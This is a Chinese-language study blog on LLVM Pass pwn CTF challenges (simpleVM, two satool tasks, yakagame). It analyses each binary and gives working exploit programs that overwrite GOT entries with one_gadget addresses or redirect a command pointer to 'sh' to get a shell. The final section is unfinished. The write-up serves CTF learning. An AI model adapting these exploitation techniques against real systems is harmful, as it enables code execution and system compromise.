llvm pass pwn 入门学习
对于没有学习过C++的人来说很不友好,仿佛让我回到学习java的时候(java烂的一批),各种包,函数,实现类,什么迭代器,红黑树什么的,看来抽点时间学习一下c++是有必要的
环境
说实话这个环境搞了两天,老是报Error opening 'LLVMHello.so': LLVMHello.so: cannot open shared object file: No such file or directory这个错误解决方法就是加上绝对路径就行了或者在.bashrc或.zshrc中修改一下环境变量
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:.
一些命令
clang-8 -emit-llvm -S exp.c -o exp.ll 加载指定.so文件编译成中间文件.ll
./opt-8 -load ./VMPass.so -VMPass ./exp.ll 通过.ll文件进行攻击
set args -load VMPass.so -VMPass exp.ll 在调试时设置一些参数
llvm::Pass::preparePassManager 在开始调试时下的断点
如何搜索pass名称: alt+t 输入 namespace便可以找到
2021红帽杯 simpleVM
程序分析
alt+t找到重写的runOnFunction函数是sub_6830`
这个一部分就是用来判断函数的名字是不是o0o0o0o0
进入sub_6AC0这一部分就是用来分析函数的基本块
进入sub_6B80 就是具体分析基本块的供能,并去实现它
这一部分有点长就不再具体分析,主要就是实现一个vm
主要就是llvm::CallBase这个抽象类,了解下面实现的方法就基本上就可以读懂这个程序的流程
Function *getCalledFunction() const: 这个方法用于获取被调用的函数指针。如果函数调用是一个直接调用(CallInst),并且被调用函数是已知的,那么该方法将返回被调用函数的指针;否则,返回nullptr。bool isIndirectCall() const: 这个方法用于检查函数调用是否是间接调用。如果函数调用是间接调用,那么它的目标函数是在运行时动态决定的,而不是在编译时确定的。Value *getCalledValue() const: 这个方法用于获取函数调用的被调用值。对于直接调用,该方法返回被调用的函数指针;对于间接调用,返回用于动态计算目标函数的值。unsigned getNumArgOperands() const: 这个方法用于获取函数调用指令的参数数量。Value *getArgOperand(unsigned i) const: 这个方法用于获取函数调用指令的第i个参数值。void setArgOperand(unsigned i, Value *val): 这个方法用于设置函数调用指令的第i个参数值为指定的val。OperandBundleUse getOperandBundle(StringRef Name) const: 这个方法用于获取函数调用指令中指定名称的操作数束。操作数束是用于传递额外信息的参数组合。void addOperandBundleUse(OperandBundleUse Bundle): 这个方法用于向函数调用指令添加一个操作数束。
漏洞就就是load和store可以通过这两个函数实现任意地址读写
漏洞攻击就是修改llvm::legacy::PassManager::~PassManager()的got表,我看好多人都是修改free函数的got表,但是不成功,就发现winmt师傅的方法可以打通,就是修改llvm::legacy::PassManager::~PassManager()的got表为onegadget
llvm::legacy::PassManager::~PassManager() 在 llvm::legacy::PassManager 对象的生命周期结束时被自动调用,用于执行清理和释放资源的操作。在对象的销毁过程中,会自动释放该 Pass 管理器对象所拥有的所有 Pass 对象,确保资源正确释放。
调试过程
add(1, 0x77E100);
效果:向寄存器1指定的地址中写入数据
load(1);
效果:将寄存器1中存放的地址的值放到寄存器2中
min(2, 0x9a6d0);
效果:就是将free函数的真实地址减了0x9a6d0(也就是free函数的偏移)
add(2, 0xe3afe);
效果:就是得到了onegadget的真实地址、
add(1, 0x870);
0x870是free的got表到2llvm::legacy::PassManager::~PassManager()@got.plt的距离
store(1);
效果将llvm::legacy::PassManager::~PassManager()@got.plt里面的值修改为onegadget
exp
// clang-8 -emit-llvm -S exp.c -o exp.ll
void add(int num, long long val);
void min(int num, long long val);
void load(int num);
void store(int num);
void o0o0o0o0()
{
add(1, 0x77E100); //got
load(1);
min(2, 0x9a6d0); // free forge
add(2, 0xe3afe); // onegadget
add(1, 0x870);
store(1);
}
//./opt-8 -load ./VMPass.so -VMPass ./exp.ll
CISCN-2021 satool
程序分析
还是首先找得到重写的runOnFunction由于是小端序,故函数名应是B4ckDo0r
主要有save,takeaway,stealkey,fakekey,run这几个函数,但只用到了save,stealkey,fakekey,run这几个函数
save
主要效果就是可以申请一个0x20的chunk,需要两个参数
stealkey
效果就是将申请的chunk中的值赋给key
fakekey
效果就是将fakekey的参数和chunk中前八个字节中存放的数进行相加并再次放到chunk
run
就是执行chunk中数据
攻击思路
既然有run这个漏洞,我就设法让chunk中出现onegadget
出现了堆,我们就看一下刚开始时bin中情况
我们可以发现当我们第二次申请chunk时就可以从ubuntu中申请,在联想stealkey和fakekey的功能,因此我们只要第二次使用save时第一个参数为空就行了,再利用stealkey将(main_area+96)放进key中在fakekey时,计算好偏移既可以将chunk放进一个onegadget
exp
void save(char *a, char *b);
void stealkey();
void fakekey(long long x);
void run();
void B4ckDo0r()
{
save("trunk", "trunk");
save("", "trunk");
stealkey();
fakekey(-0x1ecbf0+0xe3afe);
run();
}
强网杯-2022 yakagame
程序分析
本题重写的runOnFunction函数为sub_C880,PASS名称为ayaka。
分析可得这是一个元神玩家出的题,
fight函数
好像是一个攻击bss的一个过程,通过比较伤害和bss的血量的差来得到score,如果
score大于0x12345678
score的赋值语句是v53 = weaponlist[v54]; *score = v53 - boss;但是显然是不可能的因为weaponlist数组是char类型的
merge(无关紧要)
就是将某个武器的伤害加到另一个武器上
destroy(无关紧要)
将选择的武器伤害置零
upgrade(无关紧要)
将所有的武器伤害加上一个数值
4个对cmd的运算
可以对cmd进行加减异或运算,将原本的字符
0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68, 0x66转换为cat flag的asicc
else(非常重要)
由于之前没学习过c++ ,这里面使用了红黑树和迭代器混合进行一系列的操作,分析的时候基本不懂,调试老长时间才分析出大概流程(用词表达可能会很不恰当请见谅)
就是它会将不属于上面的所有函数和对应的参数用键值来一一对应,第一次进行配对时无法进入
if ( (std::operator==<char>(v22, v58) & 1) != 0 )中,只有第二次出现同一个函数名时才会进入,而且weaponlist[v33] = *(_BYTE *)(v24 + 0x20);中的v24时函数第一次出现时对应的参数,第二次出现的参数没有任何影响,这个赋值有一个漏洞就是v33是char类型,并且cmd和score就在weaponlist数组上面,也就是我们可以通过char类型整数溢出来修改score和cmd
exp
其实有两种,一种就是利用它给的四种运算得到cat flag,另一种就是直接修改cmd,让它指向sh
第一种:直接修改cmd
void fight(int weapon){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
trunk000(0);
trunk001(0);
trunk002(0);
trunk003(0);
trunk004(0);
trunk005(0);
trunk006(0);
trunk007(0);
trunk008(0);
trunk009(0);
trunk010(0);
trunk011(0);
trunk012(0);
trunk013(0);
trunk014(0);
trunk015(0);
trunk016(0);
trunk017(0);
trunk018(0);
trunk019(0);
trunk020(0);
trunk021(0);
trunk022(0);
trunk023(0);
trunk024(0);
trunk025(0);
trunk026(0);
trunk027(0);
trunk028(0);
trunk029(0);
trunk030(0);
trunk031(0);
trunk032(0);
trunk033(0);
trunk034(0);
trunk035(0);
trunk036(0);
trunk037(0);
trunk038(0);
trunk039(0);
trunk040(0);
trunk041(0);
trunk042(0);
trunk043(0);
trunk044(0);
trunk045(0);
trunk046(0);
trunk047(0);
trunk048(0);
trunk049(0);
trunk050(0);
trunk051(0);
trunk052(0);
trunk053(0);
trunk054(0);
trunk055(0);
trunk056(0);
trunk057(0);
trunk058(0);
trunk059(0);
trunk060(0);
trunk061(0);
trunk062(0);
trunk063(0);
trunk064(0);
trunk065(0);
trunk066(0);
trunk067(0);
trunk068(0);
trunk069(0);
trunk070(0);
trunk071(0);
trunk072(0);
trunk073(0);
trunk074(0);
trunk075(0);
trunk076(0);
trunk077(0);
trunk078(0);
trunk079(0);
trunk080(0);
trunk081(0);
trunk082(0);
trunk083(0);
trunk084(0);
trunk085(0);
trunk086(0);
trunk087(0);
trunk088(0);
trunk089(0);
trunk090(0);
trunk091(0);
trunk092(0);
trunk093(0);
trunk094(0);
trunk095(0);
trunk096(0);
trunk097(0);
trunk098(0);
trunk099(0);
trunk100(0);
trunk101(0);
trunk102(0);
trunk103(0);
trunk104(0);
trunk105(0);
trunk106(0);
trunk107(0);
trunk108(0);
trunk109(0);
trunk110(0);
trunk111(0);
trunk112(0);
trunk113(0);
trunk114(0);
trunk115(0);
trunk116(0);
trunk117(0);
trunk118(0);
trunk119(0);
trunk120(0);
trunk121(0);
trunk122(0);
trunk123(0);
trunk124(0);
trunk125(0);
trunk126(0);
trunk127(0);
trunk128(0);
trunk129(0);
trunk130(0);
trunk131(0);
trunk132(0);
trunk133(0);
trunk134(0);
trunk135(0);
trunk136(0);
trunk137(0);
trunk138(0);
trunk139(0);
trunk140(0);
trunk141(0);
trunk142(0);
trunk143(0);
trunk144(0);
trunk145(0);
trunk146(0);
trunk147(0);
trunk148(0);
trunk149(0);
trunk150(0);
trunk151(0);
trunk152(0);
trunk153(0);
trunk154(0);
trunk155(0);
trunk156(0);
trunk157(0);
trunk158(0);
trunk159(0);
trunk160(0);
trunk161(0);
trunk162(0);
trunk163(0);
trunk164(0);
trunk165(0);
trunk166(0);
trunk167(0);
trunk168(0);
trunk169(0);
trunk170(0);
trunk171(0);
trunk172(0);
trunk173(0);
trunk174(0);
trunk175(0);
trunk176(0);
trunk177(0);
trunk178(0);
trunk179(0);
trunk180(0);
trunk181(0);
trunk182(0);
trunk183(0);
trunk184(0);
trunk185(0);
trunk186(0);
trunk187(0);
trunk188(0);
trunk189(0);
trunk190(0);
trunk191(0);
trunk192(0);
trunk193(0);
trunk194(0);
trunk195(0);
trunk196(0);
trunk197(0);
trunk198(0);
trunk199(0);
trunk200(0);
trunk201(0);
trunk202(0);
trunk203(0);
trunk204(0);
trunk205(0);
trunk206(0);
trunk207(0);
trunk208(0);
trunk209(0);
trunk210(0);
trunk211(0);
trunk212(0);
trunk213(0);
trunk214(0);
trunk215(0);
trunk216(0);
trunk217(0);
trunk218(0);
trunk219(0);
trunk220(0);
trunk221(0);
trunk222(0);
trunk223(0);
trunk224(0);
trunk225(0);
trunk226(0);
trunk227(0);
trunk228(0);
trunk229(0);
trunk230(0);
trunk231(0);
//修改cmd 0x6EFDAD sh
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk236(0);
trunk237(0);
trunk238(0);
trunk239(0);
trunk240(0);
//修改score
trunk241(0);
trunk242(0x40);
trunk243(0);
trunk244(0);
trunk245(0);
trunk246(0);
trunk247(0);
trunk248(0);
trunk249(0);
trunk250(0);
trunk251(0);
trunk252(0);
trunk253(0);
trunk254(0);
trunk255(0);
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk241(0);
trunk242(0);
trunk243(0);
trunk244(0);
fight(0);
}
第二种
就是将
0x92, 0x68, 0x7B, 0x27, 0x6D, 0x93, 0x68,经过运算得到0x63 0x61 0x74 0x20 0x66 0x6C 0x61 0x67
菜鸡打算自己写一个脚本爆破一下,结果发现不行
我看C0Lin师傅使用下面方法得到的
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
guobapenhuo();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
tiandongwanxiang();
wuxiangdeyidao();
zhanjinniuza();
void fight(int weapon){return;}
void wuxiangdeyidao(){return;}
void zhanjinniuza(){return;}
void guobapenhuo(){return;}
void tiandongwanxiang(){return;}
void upgrade(int val){return;}
void trunk000(int x){return;}
void trunk001(int x){return;}
void trunk002(int x){return;}
void trunk003(int x){return;}
void trunk004(int x){return;}
void trunk005(int x){return;}
void trunk006(int x){return;}
void trunk007(int x){return;}
void trunk008(int x){return;}
void trunk009(int x){return;}
void trunk010(int x){return;}
void trunk011(int x){return;}
void trunk012(int x){return;}
void trunk013(int x){return;}
void trunk014(int x){return;}
void trunk015(int x){return;}
void trunk016(int x){return;}
void trunk017(int x){return;}
void trunk018(int x){return;}
void trunk019(int x){return;}
void trunk020(int x){return;}
void trunk021(int x){return;}
void trunk022(int x){return;}
void trunk023(int x){return;}
void trunk024(int x){return;}
void trunk025(int x){return;}
void trunk026(int x){return;}
void trunk027(int x){return;}
void trunk028(int x){return;}
void trunk029(int x){return;}
void trunk030(int x){return;}
void trunk031(int x){return;}
void trunk032(int x){return;}
void trunk033(int x){return;}
void trunk034(int x){return;}
void trunk035(int x){return;}
void trunk036(int x){return;}
void trunk037(int x){return;}
void trunk038(int x){return;}
void trunk039(int x){return;}
void trunk040(int x){return;}
void trunk041(int x){return;}
void trunk042(int x){return;}
void trunk043(int x){return;}
void trunk044(int x){return;}
void trunk045(int x){return;}
void trunk046(int x){return;}
void trunk047(int x){return;}
void trunk048(int x){return;}
void trunk049(int x){return;}
void trunk050(int x){return;}
void trunk051(int x){return;}
void trunk052(int x){return;}
void trunk053(int x){return;}
void trunk054(int x){return;}
void trunk055(int x){return;}
void trunk056(int x){return;}
void trunk057(int x){return;}
void trunk058(int x){return;}
void trunk059(int x){return;}
void trunk060(int x){return;}
void trunk061(int x){return;}
void trunk062(int x){return;}
void trunk063(int x){return;}
void trunk064(int x){return;}
void trunk065(int x){return;}
void trunk066(int x){return;}
void trunk067(int x){return;}
void trunk068(int x){return;}
void trunk069(int x){return;}
void trunk070(int x){return;}
void trunk071(int x){return;}
void trunk072(int x){return;}
void trunk073(int x){return;}
void trunk074(int x){return;}
void trunk075(int x){return;}
void trunk076(int x){return;}
void trunk077(int x){return;}
void trunk078(int x){return;}
void trunk079(int x){return;}
void trunk080(int x){return;}
void trunk081(int x){return;}
void trunk082(int x){return;}
void trunk083(int x){return;}
void trunk084(int x){return;}
void trunk085(int x){return;}
void trunk086(int x){return;}
void trunk087(int x){return;}
void trunk088(int x){return;}
void trunk089(int x){return;}
void trunk090(int x){return;}
void trunk091(int x){return;}
void trunk092(int x){return;}
void trunk093(int x){return;}
void trunk094(int x){return;}
void trunk095(int x){return;}
void trunk096(int x){return;}
void trunk097(int x){return;}
void trunk098(int x){return;}
void trunk099(int x){return;}
void trunk100(int x){return;}
void trunk101(int x){return;}
void trunk102(int x){return;}
void trunk103(int x){return;}
void trunk104(int x){return;}
void trunk105(int x){return;}
void trunk106(int x){return;}
void trunk107(int x){return;}
void trunk108(int x){return;}
void trunk109(int x){return;}
void trunk110(int x){return;}
void trunk111(int x){return;}
void trunk112(int x){return;}
void trunk113(int x){return;}
void trunk114(int x){return;}
void trunk115(int x){return;}
void trunk116(int x){return;}
void trunk117(int x){return;}
void trunk118(int x){return;}
void trunk119(int x){return;}
void trunk120(int x){return;}
void trunk121(int x){return;}
void trunk122(int x){return;}
void trunk123(int x){return;}
void trunk124(int x){return;}
void trunk125(int x){return;}
void trunk126(int x){return;}
void trunk127(int x){return;}
void trunk128(int x){return;}
void trunk129(int x){return;}
void trunk130(int x){return;}
void trunk131(int x){return;}
void trunk132(int x){return;}
void trunk133(int x){return;}
void trunk134(int x){return;}
void trunk135(int x){return;}
void trunk136(int x){return;}
void trunk137(int x){return;}
void trunk138(int x){return;}
void trunk139(int x){return;}
void trunk140(int x){return;}
void trunk141(int x){return;}
void trunk142(int x){return;}
void trunk143(int x){return;}
void trunk144(int x){return;}
void trunk145(int x){return;}
void trunk146(int x){return;}
void trunk147(int x){return;}
void trunk148(int x){return;}
void trunk149(int x){return;}
void trunk150(int x){return;}
void trunk151(int x){return;}
void trunk152(int x){return;}
void trunk153(int x){return;}
void trunk154(int x){return;}
void trunk155(int x){return;}
void trunk156(int x){return;}
void trunk157(int x){return;}
void trunk158(int x){return;}
void trunk159(int x){return;}
void trunk160(int x){return;}
void trunk161(int x){return;}
void trunk162(int x){return;}
void trunk163(int x){return;}
void trunk164(int x){return;}
void trunk165(int x){return;}
void trunk166(int x){return;}
void trunk167(int x){return;}
void trunk168(int x){return;}
void trunk169(int x){return;}
void trunk170(int x){return;}
void trunk171(int x){return;}
void trunk172(int x){return;}
void trunk173(int x){return;}
void trunk174(int x){return;}
void trunk175(int x){return;}
void trunk176(int x){return;}
void trunk177(int x){return;}
void trunk178(int x){return;}
void trunk179(int x){return;}
void trunk180(int x){return;}
void trunk181(int x){return;}
void trunk182(int x){return;}
void trunk183(int x){return;}
void trunk184(int x){return;}
void trunk185(int x){return;}
void trunk186(int x){return;}
void trunk187(int x){return;}
void trunk188(int x){return;}
void trunk189(int x){return;}
void trunk190(int x){return;}
void trunk191(int x){return;}
void trunk192(int x){return;}
void trunk193(int x){return;}
void trunk194(int x){return;}
void trunk195(int x){return;}
void trunk196(int x){return;}
void trunk197(int x){return;}
void trunk198(int x){return;}
void trunk199(int x){return;}
void trunk200(int x){return;}
void trunk201(int x){return;}
void trunk202(int x){return;}
void trunk203(int x){return;}
void trunk204(int x){return;}
void trunk205(int x){return;}
void trunk206(int x){return;}
void trunk207(int x){return;}
void trunk208(int x){return;}
void trunk209(int x){return;}
void trunk210(int x){return;}
void trunk211(int x){return;}
void trunk212(int x){return;}
void trunk213(int x){return;}
void trunk214(int x){return;}
void trunk215(int x){return;}
void trunk216(int x){return;}
void trunk217(int x){return;}
void trunk218(int x){return;}
void trunk219(int x){return;}
void trunk220(int x){return;}
void trunk221(int x){return;}
void trunk222(int x){return;}
void trunk223(int x){return;}
void trunk224(int x){return;}
void trunk225(int x){return;}
void trunk226(int x){return;}
void trunk227(int x){return;}
void trunk228(int x){return;}
void trunk229(int x){return;}
void trunk230(int x){return;}
void trunk231(int x){return;}
void trunk232(int x){return;}
void trunk233(int x){return;}
void trunk234(int x){return;}
void trunk235(int x){return;}
void trunk236(int x){return;}
void trunk237(int x){return;}
void trunk238(int x){return;}
void trunk239(int x){return;}
void trunk240(int x){return;}
void trunk241(int x){return;}
void trunk242(int x){return;}
void trunk243(int x){return;}
void trunk244(int x){return;}
void trunk245(int x){return;}
void trunk246(int x){return;}
void trunk247(int x){return;}
void trunk248(int x){return;}
void trunk249(int x){return;}
void trunk250(int x){return;}
void trunk251(int x){return;}
void trunk252(int x){return;}
void trunk253(int x){return;}
void trunk254(int x){return;}
void trunk255(int x){return;}
void gamestart()
{
trunk000(0);
trunk001(0);
trunk002(0);
trunk003(0);
trunk004(0);
trunk005(0);
trunk006(0);
trunk007(0);
trunk008(0);
trunk009(0);
trunk010(0);
trunk011(0);
trunk012(0);
trunk013(0);
trunk014(0);
trunk015(0);
trunk016(0);
trunk017(0);
trunk018(0);
trunk019(0);
trunk020(0);
trunk021(0);
trunk022(0);
trunk023(0);
trunk024(0);
trunk025(0);
trunk026(0);
trunk027(0);
trunk028(0);
trunk029(0);
trunk030(0);
trunk031(0);
trunk032(0);
trunk033(0);
trunk034(0);
trunk035(0);
trunk036(0);
trunk037(0);
trunk038(0);
trunk039(0);
trunk040(0);
trunk041(0);
trunk042(0);
trunk043(0);
trunk044(0);
trunk045(0);
trunk046(0);
trunk047(0);
trunk048(0);
trunk049(0);
trunk050(0);
trunk051(0);
trunk052(0);
trunk053(0);
trunk054(0);
trunk055(0);
trunk056(0);
trunk057(0);
trunk058(0);
trunk059(0);
trunk060(0);
trunk061(0);
trunk062(0);
trunk063(0);
trunk064(0);
trunk065(0);
trunk066(0);
trunk067(0);
trunk068(0);
trunk069(0);
trunk070(0);
trunk071(0);
trunk072(0);
trunk073(0);
trunk074(0);
trunk075(0);
trunk076(0);
trunk077(0);
trunk078(0);
trunk079(0);
trunk080(0);
trunk081(0);
trunk082(0);
trunk083(0);
trunk084(0);
trunk085(0);
trunk086(0);
trunk087(0);
trunk088(0);
trunk089(0);
trunk090(0);
trunk091(0);
trunk092(0);
trunk093(0);
trunk094(0);
trunk095(0);
trunk096(0);
trunk097(0);
trunk098(0);
trunk099(0);
trunk100(0);
trunk101(0);
trunk102(0);
trunk103(0);
trunk104(0);
trunk105(0);
trunk106(0);
trunk107(0);
trunk108(0);
trunk109(0);
trunk110(0);
trunk111(0);
trunk112(0);
trunk113(0);
trunk114(0);
trunk115(0);
trunk116(0);
trunk117(0);
trunk118(0);
trunk119(0);
trunk120(0);
trunk121(0);
trunk122(0);
trunk123(0);
trunk124(0);
trunk125(0);
trunk126(0);
trunk127(0);
trunk128(0);
trunk129(0);
trunk130(0);
trunk131(0);
trunk132(0);
trunk133(0);
trunk134(0);
trunk135(0);
trunk136(0);
trunk137(0);
trunk138(0);
trunk139(0);
trunk140(0);
trunk141(0);
trunk142(0);
trunk143(0);
trunk144(0);
trunk145(0);
trunk146(0);
trunk147(0);
trunk148(0);
trunk149(0);
trunk150(0);
trunk151(0);
trunk152(0);
trunk153(0);
trunk154(0);
trunk155(0);
trunk156(0);
trunk157(0);
trunk158(0);
trunk159(0);
trunk160(0);
trunk161(0);
trunk162(0);
trunk163(0);
trunk164(0);
trunk165(0);
trunk166(0);
trunk167(0);
trunk168(0);
trunk169(0);
trunk170(0);
trunk171(0);
trunk172(0);
trunk173(0);
trunk174(0);
trunk175(0);
trunk176(0);
trunk177(0);
trunk178(0);
trunk179(0);
trunk180(0);
trunk181(0);
trunk182(0);
trunk183(0);
trunk184(0);
trunk185(0);
trunk186(0);
trunk187(0);
trunk188(0);
trunk189(0);
trunk190(0);
trunk191(0);
trunk192(0);
trunk193(0);
trunk194(0);
trunk195(0);
trunk196(0);
trunk197(0);
trunk198(0);
trunk199(0);
trunk200(0);
trunk201(0);
trunk202(0);
trunk203(0);
trunk204(0);
trunk205(0);
trunk206(0);
trunk207(0);
trunk208(0);
trunk209(0);
trunk210(0);
trunk211(0);
trunk212(0);
trunk213(0);
trunk214(0);
trunk215(0);
trunk216(0);
trunk217(0);
trunk218(0);
trunk219(0);
trunk220(0);
trunk221(0);
trunk222(0);
trunk223(0);
trunk224(0);
trunk225(0);
trunk226(0);
trunk227(0);
trunk228(0);
trunk229(0);
trunk230(0);
trunk231(0);
//修改cmd 0x6EFDAD sh
trunk232(0xad);
trunk233(0xfd);
trunk234(0x6e);
trunk235(0);
trunk236(0);
trunk237(0);
trunk238(0);
trunk239(0);
trunk240(0);
//修改score
trunk241(0);
trunk242(0x40);
trunk243(0);
trunk244(0);
trunk245(0);
trunk246(0);
trunk247(0);
trunk248(0);
trunk249(0);
trunk250(0);
trunk251(0);
trunk252(0);
trunk253(0);
trunk254(0);
trunk255(0);
trunk241(0);
trunk242(0);
trunk243(0);
trunk244(0);
upgrade(0xFF);
fight(0);
}
CISCN-2022 satool
暂时先不写了连续学了一个星期有点累先去做点常规的pwn过段时间在来叫这到题写一下也许到那时候思路会更清晰,先放了比较详细的文章llvmPWN_ciscn2022_satool | Fang's Blog! (gitee.io)
define dso_local i64 @pwn(i64 %0) local_unnamed_addr #0 {
%2 = add nsw i64 %0, 21732277098 0x50F583B6A
%3 = add nsw i64 %2, 426533919260756112 0x5EB5A56F6314890
%4 = add nsw i64 %3, 426712264860536976
%5 = add nsw i64 %4, 426555988614513992
%6 = add nsw i64 %5, 426470739404150928
%7 = add nsw i64 %6, 426435038325729424
%8 = add nsw i64 %7, 20000000000000
ret i64 %8
}